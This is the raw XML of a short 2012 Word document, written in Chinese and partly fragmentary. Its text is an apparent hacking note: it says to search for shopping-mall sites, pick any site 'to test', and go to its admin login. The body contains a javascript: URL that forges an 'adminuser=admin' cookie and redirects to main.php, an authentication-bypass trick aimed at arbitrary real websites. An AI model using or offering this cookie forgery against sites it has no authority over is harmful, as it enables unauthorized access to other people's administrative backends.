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4CA" w:rsidRDefault="000834CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000834CA" w:rsidRDefault="000834CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000834CA" w:rsidRDefault="000834CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005323E1" w:rsidRDefault="000834CA">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000834CA">
        <w:t>javascript:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000834CA">
        <w:t>alert(document.cookie="COOKIEadminuser="+escape("admin"));location.href="main.php"</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005323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FB3" w:rsidRDefault="00A80FB3" w:rsidP="000834CA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A80FB3" w:rsidRDefault="00A80FB3" w:rsidP="0008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4CA" w:rsidRDefault="000834C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4CA" w:rsidRDefault="000834C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4CA" w:rsidRDefault="000834C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FB3" w:rsidRDefault="00A80FB3" w:rsidP="000834CA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A80FB3" w:rsidRDefault="00A80FB3" w:rsidP="000834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4CA" w:rsidRDefault="000834C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4CA" w:rsidRDefault="000834CA">
    <w:pPr>
      <w:pStyle w:val="a3"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="000834CA" w:rsidRDefault="000834CA">
    <w:pPr>
      <w:pStyle w:val="a3"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="000834CA">
      <w:t>搜索关键字</w:t>
    </w:r>
    <w:r w:rsidRPr="000834CA">
      <w:br/>
    </w:r>
    <w:r w:rsidRPr="000834CA">
      <w:t>收藏本站淘宝秒杀平台淘宝商城皇冠店铺淘宝团购电器城</w:t>
    </w:r>
    <w:r w:rsidRPr="000834CA">
      <w:br/>
    </w:r>
    <w:r w:rsidRPr="000834CA">
      <w:br/>
    </w:r>
    <w:r w:rsidRPr="000834CA">
      <w:br/>
    </w:r>
    <w:r w:rsidRPr="000834CA">
      <w:t>随便找个站测试下</w:t>
    </w:r>
    <w:r w:rsidRPr="000834CA">
      <w:br/>
    </w:r>
    <w:r w:rsidRPr="000834CA">
      <w:br/>
    </w:r>
    <w:r w:rsidRPr="000834CA">
      <w:t>进入后台登陆口</w:t>
    </w:r>
    <w:r w:rsidRPr="000834CA">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidRPr="000834CA">
      <w:t>默认是</w:t>
    </w:r>
    <w:r w:rsidRPr="000834CA">
      <w:t>admin</w:t>
    </w:r>
    <w:bookmarkStart w:id="0" w:name="_GoBack"/>
    <w:bookmarkEnd w:id="0"/>
  </w:p>
  <w:p w:rsidR="000834CA" w:rsidRDefault="000834CA">
    <w:pPr>
      <w:pStyle w:val="a3"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="000834CA" w:rsidRDefault="000834CA">
    <w:pPr>
      <w:pStyle w:val="a3"/>
    </w:pPr>
    <w:r w:rsidRPr="000834CA">
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0">
          <wp:extent cx="3181350" cy="2324100"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="1" name="图片 1" descr="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img_7050" descr="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2324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4CA" w:rsidRDefault="000834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58F"/>
    <w:rsid w:val="000834CA"/>
    <w:rsid w:val="005323E1"/>
    <w:rsid w:val="0083758F"/>
    <w:rsid w:val="00A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4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4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34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34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4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4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34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34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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>g4</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-11-18T11:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-11-18T11:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>